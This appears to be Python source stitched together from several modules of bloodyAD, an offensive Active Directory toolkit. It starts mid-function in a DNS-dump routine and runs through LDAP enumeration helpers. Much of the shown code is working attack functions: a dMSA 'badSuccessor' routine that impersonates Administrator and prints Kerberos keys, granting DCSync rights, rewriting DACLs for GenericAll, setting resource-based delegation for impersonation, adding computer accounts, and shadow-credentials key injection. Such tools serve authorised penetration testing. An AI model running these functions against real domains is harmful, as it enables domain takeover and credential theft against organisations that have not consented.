                                            "zoneAdminEmail"
                                        ].replace(".", "@", 1),
                                    }
                                )
                        except KeyError:
                            LOG.error("KeyError for record: " + record)
                            continue

                    yield yield_entry
            except (NoResultError, LDAPSearchException) as e:
                if type(e) is NoResultError:
                    LOG.warning(f"No readable record found in {nc}")
                else:
                    LOG.warning(f"{nc} couldn't be read on {conn.conf.host}")
                continue
        # List record names if we have list child right on dnsZone or MicrosoftDNS container but no READ_PROP on record object
        for nc in ldap.appNCs:
            dnsZones.append(f"CN=MicrosoftDNS,{nc}")
        dnsZones.append(f"CN=MicrosoftDNS,CN=System,{ldap.domainNC}")
        for searchbase in dnsZones:
            try:
                entries = ldap.bloodysearch(
                    searchbase,
                    "(objectClass=*)",
                    search_scope=Scope.SUBTREE,
                    attr=["objectClass"],
                )
                async for entry in entries:
                    # If we can get objectClass it means we have a READ_PROP on the record object so we already found it before
                    if (
                        entry.get("objectClass")
                        or entry["distinguishedName"] == searchbase
                    ):
                        continue

                    domain_parts = entry["distinguishedName"].split(",")
                    domain_suffix = domain_parts[1].split("=")[1]

                    domain_name = domain_parts[0].split("=")[1]
                    if no_detail and re.match("|".join(prefix_blacklist), domain_name):
                        continue

                    if domain_name[-1] != "." and domain_suffix != "MicrosoftDNS":
                        # Then it's probably not a fqdn, suffix certainly needed
                        domain_name = f"{domain_name}.{domain_suffix}"

                    ip_addr = domain_name.split(".in-addr.arpa")
                    if len(ip_addr) > 1:
                        decimals = ip_addr[0].split(".")
                        decimals.reverse()
                        while len(decimals) < 4:
                            decimals.append("0")
                        domain_name = ".".join(decimals)

                    yield {"recordName": domain_name}
            except (NoResultError, LDAPSearchException) as e:
                if type(e) is NoResultError:
                    LOG.warning(f"No listable record found in {nc}")
                else:
                    LOG.warning(f"{nc} couldn't be read on {conn.conf.host}")
                continue

    # Used to avoid duplicate entries if there is the same record in multiple partitions
    record_dict = {}
    record_entries = []
    ldap = await conn.getLdap()
    if transitive:
        trustmap = await ldap.getTrustMap()
        for trust in trustmap.values():
            if "conn" in trust:
                record_entries.append(domainDnsDump(trust["conn"], zone, no_detail))
    else:
        record_entries.append(domainDnsDump(conn, zone, no_detail))

    basic_records = []
    for records in record_entries:
        async for r in records:
            keyName = "recordName" if "recordName" in r else "zoneName"
            # If it's a record with only the record name returns it later and only if we didn't find another record with more info
            if len(r) == 1 and keyName == "recordName":
                basic_records.append(r)
                continue
            yield_r = {}

            rname = r[keyName]
            if rname in record_dict:
                for r_type in r:
                    if r_type == keyName:
                        continue
                    if record_dict[rname].get(r_type):
                        if r[r_type] in record_dict[rname][r_type]:
                            continue
                    else:
                        record_dict[rname][r_type] = []
                    yield_r[r_type] = r[r_type]
                    record_dict[rname][r_type].append(r[r_type])
                if not yield_r:
                    continue
            else:
                yield_r = r
                record_dict[rname] = {}
                for k, v in r.items():
                    record_dict[rname][k] = [v]

            yield_r[keyName] = rname

            yield yield_r

    for basic_r in basic_records:
        if basic_r["recordName"] in record_dict:
            continue
        yield basic_r


async def membership(conn, target: str, no_recurse: bool = False):
    """
    Retrieve SID and SAM Account Names of all groups a target belongs to

    :param target: sAMAccountName, DN or SID of the target
    :param no_recurse: if set, doesn't retrieve groups where target isn't a direct member
    """
    ldap = await conn.getLdap()
    ldap_filter = ""
    if no_recurse:
        entries = ldap.bloodysearch(target, attr=["objectSid", "memberOf"])
        async for entry in entries:
            for group in entry.get("memberOf", []):
                ldap_filter += f"(distinguishedName={group})"
        if not ldap_filter:
            LOG.warning("No direct group membership found")
            return
    else:
        # [MS-ADTS] 3.1.1.4.5.19 tokenGroups, tokenGroupsNoGCAcceptable
        attr = "tokenGroups"
        entries = ldap.bloodysearch(target, attr=[attr])
        async for entry in entries:
            try:
                for groupSID in entry[attr]:
                    ldap_filter += f"(objectSID={groupSID})"
            except KeyError:
                LOG.warning("No membership found")
                return
        if not ldap_filter:
            LOG.warning("no GC Server available, the set of groups might be incomplete")
            attr = "tokenGroupsNoGCAcceptable"
            entries = ldap.bloodysearch(target, attr=[attr])
            async for entry in entries:
                for groupSID in entry[attr]:
                    ldap_filter += f"(objectSID={groupSID})"

    entries = ldap.bloodysearch(
        ldap.domainNC,
        f"(|{ldap_filter})",
        search_scope=Scope.SUBTREE,
        attr=["objectSID", "sAMAccountName"],
    )
    async for entry in entries:
        yield entry


async def trusts(conn, transitive: bool = False):
    """
    Display trusts in an ascii tree starting from the DC domain as tree root. A->B means A can auth on B and A-<B means B can auth on A, A-<>B means bidirectional

    :param transitive: Try to fetch transitive trusts (you should start from a dc of your user domain to have more complete results)
    """
    ldap = await conn.getLdap()
    trust_dict = await ldap.getTrusts(transitive, conn.conf.dns)

    # Get the host domain as root for the trust tree
    trust_root_domain = ldap.domainname
    if trust_dict:
        tree = {}
        asciitree.branchFactory({":" + trust_root_domain: tree}, [], trust_dict)
        tree_printer = asciitree.LeftAligned()
        print(tree_printer({trust_root_domain: tree}))


async def object(
    conn,
    target: str,
    attr: str = "*",
    resolve_sd: bool = False,
    raw: bool = False,
    transitive: bool = False,
):
    """
    Retrieve LDAP attributes for the target object provided, binary data will be outputted in base64

    :param target: sAMAccountName, DN or SID of the target (if you give an empty string "" prints rootDSE)
    :param attr: attributes to retrieve separated by a comma, retrieves all the attributes by default
    :param resolve_sd: if set, permissions linked to a security descriptor will be resolved (see bloodyAD github wiki/Access-Control for more information)
    :param raw: if set, will return attributes as sent by the server without any formatting, binary data will be outputted in base64
    :param transitive: if set with "--resolve-sd", will try to resolve foreign SID by reaching trusts
    """
    attributesSD = [
        "nTSecurityDescriptor",
        "msDS-GroupMSAMembership",
        "msDS-AllowedToActOnBehalfOfOtherIdentity",
    ]
    conn.conf.transitive = transitive
    ldap = await conn.getLdap()
    entries = ldap.bloodysearch(target, attr=attr.split(","), raw=raw)
    rendered_entries = utils.renderSearchResult(entries)
    if resolve_sd and not raw:
        async for entry in rendered_entries:
            for attrSD in attributesSD:
                if attrSD in entry:
                    e = entry[attrSD]
                    if not isinstance(e, list):
                        entry[attrSD] = await utils.renderSD(e, conn)
                    else:
                        entry[attrSD] = [await utils.renderSD(sd, conn) for sd in e]
            yield entry
    else:
        async for entry in rendered_entries:
            yield entry


async def search(
    conn,
    base: str = "DOMAIN",
    filter: str = "(objectClass=*)",
    attr: str = "*",
    resolve_sd: bool = False,
    raw: bool = False,
    transitive: bool = False,
    c: list = [],
):
    """
    Search in LDAP database, binary data will be outputted in base64

    :param base: DN of the parent object
    :param filter: filter to apply to the LDAP search (see Microsoft LDAP filter syntax)
    :param attr: attributes to retrieve separated by a comma
    :param resolve_sd: if set, permissions linked to a security descriptor will be resolved (see bloodyAD github wiki/Access-Control for more information)
    :param raw: if set, will return attributes as sent by the server without any formatting, binary data will be outputed in base64
    :param transitive: if set with "--resolve-sd", will try to resolve foreign SID by reaching trusts
    :param c: if set, will use the controls for extended search operations, e.g. "-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065" to display tombstoned, deleted and recycled objects and their linked attributes
    """
    attributesSD = [
        "nTSecurityDescriptor",
        "msDS-GroupMSAMembership",
        "msDS-AllowedToActOnBehalfOfOtherIdentity",
    ]
    conn.conf.transitive = transitive
    ldap = await conn.getLdap()
    if base == "DOMAIN":
        base = ldap.domainNC
    # RFC2251 4.1.12 Controls
    # control ::= (controlType, criticality, controlValue)
    controls = [(oid,True,None) for oid in c]
    entries = ldap.bloodysearch(
        base, filter, search_scope=Scope.SUBTREE, attr=attr.split(","), raw=raw, controls=controls
    )
    rendered_entries = utils.renderSearchResult(entries)
    if resolve_sd and not raw:
        async for entry in rendered_entries:
            for attrSD in attributesSD:
                if attrSD in entry:
                    e = entry[attrSD]
                    if not isinstance(e, list):
                        entry[attrSD] = await utils.renderSD(e, conn)
                    else:
                        entry[attrSD] = [await utils.renderSD(sd, conn) for sd in e]
            yield entry
    else:
        async for entry in rendered_entries:
            yield entry


# TODO: Search writable for application partitions too?
async def writable(
    conn,
    otype: Literal["ALL", "OU", "USER", "COMPUTER", "GROUP", "DOMAIN", "GPO"] = "ALL",
    right: Literal["ALL", "WRITE", "CHILD"] = "ALL",
    detail: bool = False,
    include_del: bool = False,
    # partition: Literal["DOMAIN", "DNS", "ALL"] = "DOMAIN"
):
    """
    Retrieve objects writable by client

    :param otype: type of writable object to retrieve
    :param right: type of right to search
    :param detail: if set, displays attributes/object types you can write/create for the object
    :param include_del: if set, include deleted objects
    """
    # :param partition: directory partition a.k.a naming context to explore

    ldap_filter = ""
    if otype == "USER":
        ldap_filter = "(sAMAccountType=805306368)"
    elif otype == "OU":
        ldap_filter = "(|(objectClass=container)(objectClass=organizationalUnit))"
    else:
        if otype == "ALL":
            objectClass = "*"
        elif otype == "GPO":
            objectClass = "groupPolicyContainer"
        else:
            objectClass = otype
        ldap_filter = f"(objectClass={objectClass})"

    attr_params = {}
    genericReturn = (
        (lambda a: [b for b in a])
        if detail
        else (lambda a: ["permission"] if a else [])
    )
    if right == "WRITE" or right == "ALL":
        attr_params["allowedAttributesEffective"] = {
            "lambda": genericReturn,
            "right": "WRITE",
        }

        def testSDRights(a):  # Mask defined in MS-ADTS for allowedAttributesEffective
            r = []
            if not a:
                return r
            if a & 3:
                r.append("OWNER")
            if a & 4:
                r.append("DACL")
            if a & 8:
                r.append("SACL")
            return r

        attr_params["sDRightsEffective"] = {"lambda": testSDRights, "right": "WRITE"}
    if right == "CHILD" or right == "ALL":
        attr_params["allowedChildClassesEffective"] = {
            "lambda": genericReturn,
            "right": "CREATE_CHILD",
        }
    
    controls = None
    if include_del:
        controls = [("1.2.840.113556.1.4.417", True, None)]

    ldap = await conn.getLdap()
    searchbases = []
    # if partition == "DOMAIN":
    searchbases.append(ldap.domainNC)
    # elif partition == "DNS":
    #     searchbases.append(ldap.applicationNCs) # A definir https://learn.microsoft.com/en-us/windows/win32/ad/enumerating-application-directory-partitions-in-a-forest
    # else:
    #     searchbases.append(ldap.NCs) # A definir
    right_entry = {}
    for searchbase in searchbases:
        async for entry in ldap.bloodysearch(
            searchbase, ldap_filter, search_scope=Scope.SUBTREE, attr=attr_params.keys(), controls=controls
        ):
            for attr_name in entry:
                if attr_name not in attr_params:
                    continue
                key_names = attr_params[attr_name]["lambda"](entry[attr_name])
                for name in key_names:
                    if name == "distinguishedName":
                        name = "dn"
                    if name not in right_entry:
                        right_entry[name] = []
                    right_entry[name].append(attr_params[attr_name]["right"])

            if right_entry:
                yield {
                    **{"distinguishedName": entry["distinguishedName"]},
                    **right_entry,
                }
                right_entry = {}



import os
# Waiting for asysocks 0.2.18
from asysocks.unicomm.common.unissl import UniSSL
def pfx_to_pem(self, pfx_path, pfx_password):
    #https://gist.github.com/erikbern/756b1d8df2d1487497d29b90e81f8068
    from pathlib import Path
    from cryptography.hazmat.primitives.serialization import Encoding, PrivateFormat, NoEncryption
    from cryptography.hazmat.primitives.serialization.pkcs12 import load_key_and_certificates
    

    ''' Decrypts the .pfx file to be used with requests. '''
    pfx = Path(pfx_path).read_bytes()
    if isinstance(pfx_password, str):
        pfx_password = pfx_password.encode('utf-8')
    private_key, main_cert, add_certs = load_key_and_certificates(pfx, pfx_password, None)
    suffix = '%s.pem' % os.urandom(4).hex()
    self._UniSSL__keyfilename = 'key_%s' % suffix
    self._UniSSL__certfilename = 'cert_%s' % suffix
    with open(self._UniSSL__keyfilename, 'wb') as f:
        f.write(private_key.private_bytes(Encoding.PEM, PrivateFormat.PKCS8, NoEncryption()))
    with open(self._UniSSL__certfilename, 'wb') as f:
        f.write(main_cert.public_bytes(Encoding.PEM))
    if len(add_certs) > 0:
        self._UniSSL__cacertfilename = 'cacert_%s' % suffix
        with open(self._UniSSL__cacertfilename, 'wb') as f:
            for ca in add_certs:
                f.write(ca.public_bytes(Encoding.PEM))

UniSSL.pfx_to_pem = pfx_to_pem


import binascii, datetime, random, string, base64, asyncio
from typing import Literal
from urllib import parse
from bloodyAD import utils, ConnectionHandler
from bloodyAD.network import ldap
from bloodyAD.exceptions import LOG
from bloodyAD.formatters import accesscontrol, common, cryptography, dns
from bloodyAD.network.ldap import Change, Scope
from bloodyAD.exceptions import BloodyError
from bloodyAD.cli_modules import set as bloodySet
import badldap
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from kerbad.common import factory
from kerbad.common.spn import KerberosSPN
from kerbad.common.kirbi import Kirbi
from kerbad.common.ccache import CCACHE
from kerbad.protocol.external import ticketutil
from kerbad.protocol.encryption import Enctype
from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR


async def badSuccessor(conn: ConnectionHandler, dmsa: str, t: list = ["CN=Administrator,CN=Users,DC=Current,DC=Domain"], ou: str = None):
    """
    Add a new DMSA (Dedicated Managed Service Account) object

    :param dmsa: hostname of the DMSA object (no need to add '$')
    :param t: Distinguished Name of the target whose privileges are to be assumed (can be called multiple times, e.g. "-t CN=Admin,CN=Users,DC=domain,DC=com -t CN=John,CN=Users,DC=domain,DC=com")
    :param ou: Organizational Unit for the DMSA object. If not provided, chooses the first OU the logged user can add child to.
    """

    async def getWeakOU(conn):
        # Check if one of the DCs is Windows Server 2025 or higher (needed for Kerberos DMSA)
        compatible_dcs = await utils.findCompatibleDC(conn, min_version=10, scope="DOMAIN")
        if not compatible_dcs:
            raise BloodyError("DC2025 not found, DMSA not supported.")
        
        # Check if the schema version is 2025
        # schema_version = next(
        #     conn.ldap.bloodysearch(
        #         conn.ldap.schemaNC, attr=["objectVersion"], raw=True
        #     )
        # ).get("objectVersion", None)
        # if int(schema_version[0]) < 91:
        #     raise BloodyError("Schema version is not 2025. DMSA creation is not supported.")

        # First we try to find a OU where we can add a child object
        # If we don't find one, we will use the first one where we have DACL write on
        # If we don't find one, we will use the first one where we have ownership write on
        ldap = await conn.getLdap()
        ou = None
        writable_ou = []
        writable_nt_ou = []
        writable_owner_ou = []
        async for entry in ldap.bloodysearch(
            ldap.domainNC,
            ldap_filter="(|(objectClass=container)(objectClass=organizationalUnit))",
            search_scope=Scope.SUBTREE,
            attr=["distinguishedName", "allowedChildClassesEffective", "sDRightsEffective"],
        ):
            sdright_mask = entry.get("sDRightsEffective", 0)
            if "msDS-DelegatedManagedServiceAccount" in entry.get("allowedChildClassesEffective", []):
                if entry["distinguishedName"] == "CN=Managed Service Accounts," + ldap.domainNC:
                    # Choose Managed Service Accounts in priority as it is the default for dMSA
                    ou = entry["distinguishedName"]
                    break
                writable_ou.append(entry["distinguishedName"])
            elif sdright_mask & 4:
                # We have DACL write on the OU
                writable_nt_ou.append(entry["distinguishedName"])
            elif sdright_mask & 3:
                # We have ownership write on the OU
                writable_owner_ou.append(entry["distinguishedName"])

        if not ou:
            if writable_ou:
                # Choose the first OU we can add child to
                ou = writable_ou[0]
            elif writable_nt_ou:
                ou = writable_nt_ou[0]
                await genericAll(conn, ou, conn.conf.username)
            elif writable_owner_ou:
                ou = writable_owner_ou[0]
                await bloodySet.owner(conn, ou, conn.conf.username)
                await genericAll(conn, ou, conn.conf.username)                        
            else:
                raise BloodyError("No suitable OU found for adding the DMSA object")
        return ou, compatible_dcs

    ldap = await conn.getLdap()
    if not ou:
        ou,compatible_dcs = await getWeakOU(conn)
        
    if len(t) == 1:
        t = ["CN=Administrator,CN=Users," + ldap.domainNC]
    else:
        t = t[1:]

    dmsa_dn = f"CN={dmsa},{ou}"

    new_sd = accesscontrol.createEmptySD()
    access_mask = accesscontrol.ACCESS_FLAGS["GENERIC_ALL"]
    self_obj = None
    async for e in ldap.bloodysearch(ldap.domainNC,
            ldap_filter=f"(sAMAccountName={conn.conf.username})",
            search_scope=Scope.SUBTREE, attr=["objectSid"]):
        self_obj = e
        break
    self_sid = self_obj["objectSid"]
    utils.addRight(new_sd, self_sid, access_mask)

    dmsa_sama = dmsa + "$"
    LOG.info(f"Creating DMSA {dmsa_sama} in {ou}")
    LOG.info(f"Impersonating: {', '.join(t)}")
    attr = {
        "objectClass": ["msDS-DelegatedManagedServiceAccount"],
        "sAMAccountName": dmsa+'$',
        "dNSHostName": f"{dmsa}.{ldap.domainname}",
        "msDS-ManagedPasswordInterval": 30,
        "msDS-GroupMSAMembership": SECURITY_DESCRIPTOR.from_sddl(f"O:S-1-5-32-544D:(A;;0xf01ff;;;{self_sid})"),
        "msDS-DelegatedMSAState": 2,
        "msDS-ManagedAccountPrecededByLink": t,
        "msDS-SupportedEncryptionTypes": 0x1c,
        "userAccountControl": 0x1000
    }
    await ldap.bloodyadd(dmsa_dn, attributes=attr)

    client = None
    path = dmsa + "_" + "".join(
            random.choice(string.ascii_letters + string.digits) for i in range(2)
        )
    splitted_url = ldap.co_url.split("-",1)
    if "sspi" in splitted_url[0]:
        LOG.error("SSPI is not supported yet to retrieve dMSA TGT, use Rubeus or kerbad certstore, e.g.:")
        LOG.error(f"badS4U2self 'kerberos+certstore://{conn.conf.domain}\\{conn.conf.username}' 'krbtgt/{ldap.domainname}@{ldap.domainname}' '{dmsa_sama}@{ldap.domainname}' --dmsa")
        return
    
    url = "kerberos+" + splitted_url[1]

    parsed = parse.urlparse(url)
    query_params = parse.parse_qs(parsed.query)
    for param in ['serverip', 'dc', 'dcc', 'realmc']:
        query_params.pop(param, None)

    host_params = {"ip": conn.conf.dcip}
    if ldap._serverinfo["dnsHostName"] not in compatible_dcs:
        LOG.warning("The current DC does not support Kerberos for dMSA")
        LOG.info(f"Current DC does not support dMSA Kerberos, attempting alternative 2025 DCs: {compatible_dcs}")
        host_params = await utils.connectReachable(conn, compatible_dcs, ports=[88])
        if not host_params:
            LOG.error("DC2025 not found, try to reach one of the list above manually:")
            new_netloc = parsed.netloc.split("@")[0] + '@<DC2025_IP>' if '@' in parsed.netloc else parsed.netloc
            url = parse.urlunparse(parsed._replace(netloc=new_netloc, query=query_params))
            LOG.error(f"badS4U2self '{url}' 'krbtgt/{ldap.domainname}@{ldap.domainname}' '{dmsa_sama}@{ldap.domainname}' --dmsa")
            return

    new_netloc = parsed.netloc.split("@")[0] + '@' + host_params["ip"] if '@' in parsed.netloc else parsed.netloc
    url = parse.urlunparse(parsed._replace(netloc=new_netloc, query=query_params))

    LOG.debug(f"Using kerbad url: {url}")
    try:
        cu = factory.KerberosClientFactory.from_url(url)
        client = cu.get_client_blocking()
        service_spn = KerberosSPN.from_spn(f"krbtgt/{ldap.domainname}@{ldap.domainname}")
        target_user = KerberosSPN.from_upn(f"{dmsa_sama}@{ldap.domainname}")
        tgs, encTGSRepPart, key = client.with_clock_skew(client.S4U2self, target_user, service_spn, is_dmsa=True)
    except Exception as e:
        LOG.error(f"Failed to retrieve dMSA TGT")
        if host_params["ip"] != conn.conf.dcip:
            LOG.error(f"{host_params['ip']} may not be synchronized to {conn.conf.dcip}, wait or try to add dMSA directly on {host_params['ip']}")
        LOG.error("Try using Rubeus, or something like:")
        LOG.error(f"badS4U2self '{url}' 'krbtgt/{ldap.domainname}@{ldap.domainname}' '{dmsa_sama}@{ldap.domainname}' --dmsa")
        raise e

    kirbi = Kirbi.from_ticketdata(tgs, encTGSRepPart)
    LOG.info(str(kirbi))

    ccache = CCACHE().from_kirbi(kirbi)
    ccache_path = path + ".ccache"
    ccache.to_file(path + ".ccache")
    LOG.info('dMSA TGT stored in ccache file %s' % ccache_path)

    dmsa_pack = ticketutil.get_KRBKeys_From_TGSRep(encTGSRepPart)

    LOG.info('\ndMSA current keys found in TGS:')
    for current_key in dmsa_pack['current-keys']:
        LOG.info("%s: %s" % (Enctype.get_name(current_key['keytype']), current_key['keyvalue'].hex()))
    LOG.info('\ndMSA previous keys found in TGS (including keys of preceding managed accounts):')
    for previous_key in dmsa_pack['previous-keys']:
        LOG.info("%s: %s" % (Enctype.get_name(previous_key['keytype']), previous_key['keyvalue'].hex()))


async def computer(conn: ConnectionHandler, hostname: str, newpass: str, ou: str = "DefaultOU", lifetime: int = 0):
    """
    Add new computer

    :param hostname: computer name (without trailing $)
    :param newpass: password for computer
    :param ou: Organizational Unit for computer
    :param lifetime: lifetime of new computer in seconds, if non-zero creates it as a dynamic object
    """

    ldap = await conn.getLdap()
    if ou == "DefaultOU":
        container = None
        entry = None
        async for e in ldap.bloodysearch(ldap.domainNC, attr=["wellKnownObjects"]):
            entry = e
            break
        for obj in entry["wellKnownObjects"]:
            if "GUID_COMPUTERS_CONTAINER_W" == obj.binary_value:
                container = obj.dn
                break
        if not container:
            LOG.warning(
                "Default container for computers not found, defaulting to CN=Computers,"
                + ldap.domainNC
            )
            container = "cn=Computers" + ldap.domainNC
        computer_dn = f"cn={hostname},{container}"
    else:
        computer_dn = f"cn={hostname},{ou}"

    # Default computer SPNs
    spns = [
        "HOST/%s" % hostname,
        "HOST/%s.%s" % (hostname, ldap.domainname),
        "RestrictedKrbHost/%s" % hostname,
        "RestrictedKrbHost/%s.%s" % (hostname, ldap.domainname),
    ]
    attr = {
        "objectClass": [
            "top",
            "person",
            "organizationalPerson",
            "user",
            "computer",
        ],
        "dnsHostName": "%s.%s" % (hostname, ldap.domainname),
        "userAccountControl": 0x1000,
        "servicePrincipalName": spns,
        "sAMAccountName": f"{hostname}$",
        "unicodePwd": '"%s"' % newpass,
    }

    if lifetime > 0:
        attr["objectClass"].append("dynamicObject")
        attr["entryTTL"] = lifetime
    
    # When the requester specifies LDAP_SERVER_BYPASS_QUOTA_OID control "1.2.840.113556.1.4.2256"
    # And has been granted the control access right DS-Bypass-Quota (usually only admins) on the NC's root object (e.g. DC=example,DC=com)
    # Then the requester can bypass the default machine account quota (ms-DS-MachineAccountQuota)
    await ldap.bloodyadd(computer_dn, attributes=attr, controls=[("1.2.840.113556.1.4.2256", False, None)])
    LOG.info(f"{hostname}$ created")


async def dcsync(conn: ConnectionHandler, trustee: str):
    """
    Add DCSync right on domain to provided trustee (Requires to own or to have WriteDacl on domain object)

    :param trustee: sAMAccountName, DN or SID of the trustee
    """
    ldap = await conn.getLdap()
    new_sd, _ = await utils.getSD(conn, ldap.domainNC)
    if "s-1-" in trustee.lower():
        trustee_sid = trustee
    else:
        entry = None
        async for e in ldap.bloodysearch(trustee, attr=["objectSid"]):
            entry = e
            break
        trustee_sid = entry["objectSid"]
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    utils.addRight(new_sd, trustee_sid, access_mask)

    req_flags = badldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
        {"Flags": accesscontrol.DACL_SECURITY_INFORMATION}
    )
    controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

    await ldap.bloodymodify(
        ldap.domainNC,
        {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
        controls,
    )

    LOG.info(f"{trustee} is now able to DCSync")


# Credits to Kevin Robertson and his script Invoke-DNSUpdate.ps1 from the Powermad framework
async def dnsRecord(
    conn: ConnectionHandler,
    name: str,
    data: str,
    dnstype: Literal["A", "AAAA", "CNAME", "MX", "PTR", "SRV", "TXT"] = "A",
    zone: str = "CurrentDomain",
    ttl: int = 300,
    preference: int = 10,
    port: int = None,
    priority: int = 10,
    weight: int = 60,
    forest: bool = False,
):
    """
    This function adds a new DNS record into an AD environment.

    :param name: name of the dnsNode object (hostname) which will contain the new record
    :param data: DNS record data, for most record types this will be the destination hostname or IP address, for TXT records this can be used for text
    :param dnstype: DNS record type
    :param zone: DNS zone
    :param ttl: DNS record TTL, time in seconds the record stays in DNS caches, must be low if you want to propagate record updates quickly
    :param preference: DNS MX record preference, must be lower than the concurrent records to be chosen
    :param port: listening port of the service in a DNS SRV record
    :param priority: priority of a DNS SRV record against concurrent, must be lower to be chosen, if identical to others, highest weight will be chosen
    :param weight: weight of a DNS SRV record against concurrent, must be higher with the lowest priority to be chosen
    :param forest: if set, registers dns record in forest instead of domain
    """
    # DNS_RPC_RECORD - section 2.2.2.2.5
    # RANK_ZONE - The record comes from an authoritative zone
    rank = 0xF0

    ldap = await conn.getLdap()
    naming_context = "," + ldap.domainNC
    if zone == "CurrentDomain":
        zone = ""
        for label in naming_context.split(",DC="):
            if label:
                zone += "." + label
        if forest:
            zone = "_msdcs" + zone
        else:
            # Removes first dot
            zone = zone[1:]

    # TODO: take into account custom ForestDnsZones and DomainDnsZones partition name ?
    if forest:
        zone_type = "ForestDnsZones"
    else:
        zone_type = "DomainDnsZones"

    zone_dn = f"DC={zone},CN=MicrosoftDNS,DC={zone_type}{naming_context}"
    record_dn = None

    serial = None
    new_dnsrecord_list = None
    ldap_filter = f"(|(name=@)(name={name}))"
    async for entry in ldap.bloodysearch(
        zone_dn,
        ldap_filter=ldap_filter,
        search_scope=Scope.SUBTREE,
        attr=["name", "dnsRecord"],
        raw=True,
    ):
        if entry["name"][0] == b"@":
            for raw_record in entry["dnsRecord"]:
                dns_record = dns.Record(raw_record).toDict()
                if dns_record.get("Type") == "SOA":
                    serial = dns_record["Data"]["SerialNo"]
                    break
        else:
            record_dn = entry["distinguishedName"]
            new_dnsrecord_list = entry["dnsRecord"]

    if not serial:
        raise BloodyError(f"No '@' entry found in '{zone_dn}' with '{ldap_filter}'")
    new_dnsrecord = dns.Record()
    new_dnsrecord.fromDict(
        data, dnstype, ttl, rank, serial, preference, port, priority, weight
    )

    if not record_dn:
        record_dn = f"DC={name},{zone_dn}"
        record_attr = {
            "objectClass": ["top", "dnsNode"],
            "dnsRecord": new_dnsrecord.getData(),
            "dNSTombstoned": False,
        }
        await ldap.bloodyadd(record_dn, attributes=record_attr)
        LOG.info(f"{name} has been successfully added")
        return

    new_dnsrecord_list.append(new_dnsrecord.getData())

    await ldap.bloodymodify(
        record_dn, {"dnsRecord": [(Change.REPLACE.value, new_dnsrecord_list)]}
    )
    LOG.info(f"{name} has been successfully updated")


async def genericAll(conn: ConnectionHandler, target: str, trustee: str):
    """
    Give full control to trustee on target and descendants (you must own the object or have WriteDacl)

    :param target: sAMAccountName, DN or SID of the target
    :param trustee: sAMAccountName, DN or SID of the trustee which will have full control on target
    """
    ldap = await conn.getLdap()
    new_sd, _ = await utils.getSD(conn, target)
    if "s-1-" in trustee.lower():
        trustee_sid = trustee
    else:
        entry = None
        async for e in ldap.bloodysearch(trustee, attr=["objectSid"]):
            entry = e
            break
        trustee_sid = entry["objectSid"]
    utils.addRight(new_sd, trustee_sid)

    req_flags = badldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
        {"Flags": accesscontrol.DACL_SECURITY_INFORMATION}
    )
    controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

    await ldap.bloodymodify(
        target,
        {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
        controls,
    )

    LOG.info(f"{trustee} has now GenericAll on {target}")


async def groupMember(conn: ConnectionHandler, group: str, member: str):
    """
    Add a new member (user, group, computer) to group

    :param group: sAMAccountName, DN or SID of the group
    :param member: sAMAccountName, DN or SID of the member
    """
    # This is equivalent to classic add member,
    # see [MS-ADTS] - 3.1.1.3.1.2.4 Alternative Forms of DNs
    # But <SID='sid'> also has the advantage of being compatible with foreign security principals,
    # see [MS-ADTS] - 3.1.1.5.3.3 Processing Specifics
    ldap = await conn.getLdap()
    if "s-1-" in member.lower():
        # We assume member is an SID
        member_transformed = f"<SID={member}>"
    else:
        member_transformed = await ldap.dnResolver(member)

    await ldap.bloodymodify(group, {"member": [(Change.ADD.value, member_transformed)]})
    LOG.info(f"{member} added to {group}")


async def rbcd(conn: ConnectionHandler, target: str, service: str):
    """
    Add Resource Based Constraint Delegation for service on target, used to impersonate a user on target with service (Requires "Write" permission on target's msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012)

    :param target: sAMAccountName, DN or SID of the target
    :param service: sAMAccountName, DN or SID of the service account
    """
    ldap = await conn.getLdap()
    control_flag = 0
    new_sd, _ = await utils.getSD(
        conn, target, "msDS-AllowedToActOnBehalfOfOtherIdentity", control_flag
    )
    if "s-1-" in service.lower():
        service_sid = service
    else:
        entry = None
        async for e in ldap.bloodysearch(service, attr=["objectSid"]):
            entry = e
            break
        service_sid = entry["objectSid"]
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    utils.addRight(new_sd, service_sid, access_mask)

    await ldap.bloodymodify(
        target,
        {
            "msDS-AllowedToActOnBehalfOfOtherIdentity": [
                (
                    Change.REPLACE.value,
                    new_sd.getData(),
                )
            ]
        },
    )

    LOG.info(f"{service} can now impersonate users on {target} via S4U2Proxy")


async def shadowCredentials(conn: ConnectionHandler, target: str, path: str = "CurrentPath"):
    """
    Add Key Credentials to target (try to find a suitable DC if provided DC is below Win2016), and use those credentials to retrieve a TGT and a NT hash using PKINIT.

    :param target: sAMAccountName, DN or SID of the target
    :param path: filepath for the generated credentials (TGT ccache or pfx if PKINIT fails)
    """

    # We scope on the domain of the target
    ldap = await conn.getLdap()
    compatible_dcs = await utils.findCompatibleDC(conn, min_version=7, scope="DOMAIN")

    if ldap._serverinfo["dnsHostName"] not in compatible_dcs:
        if not compatible_dcs:
            LOG.error("No DC with Windows Server 2016 or higher found on this domain, operation aborted")
            return
        LOG.warning(
            "This DC does not seem to support KeyCredentialLink"
        )

        LOG.info(f"Attempting alternative DCs with KeyCredentialLink support: {compatible_dcs}")
        new_conn = await utils.connectReachable(conn, compatible_dcs, ports=[389,636])
        if not new_conn:
            return

    target_dn = None
    target_sAMAccountName = None
    async for entry in ldap.bloodysearch(target, attr=["distinguishedName", "sAMAccountName"]):
        target_dn = entry["distinguishedName"]
        target_sAMAccountName = entry["sAMAccountName"]
    if path == "CurrentPath":
        path = target_sAMAccountName.strip('$') + "_" + "".join(
            random.choice(string.ascii_letters + string.digits) for i in range(2)
        )

    LOG.debug("Generating certificate")

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
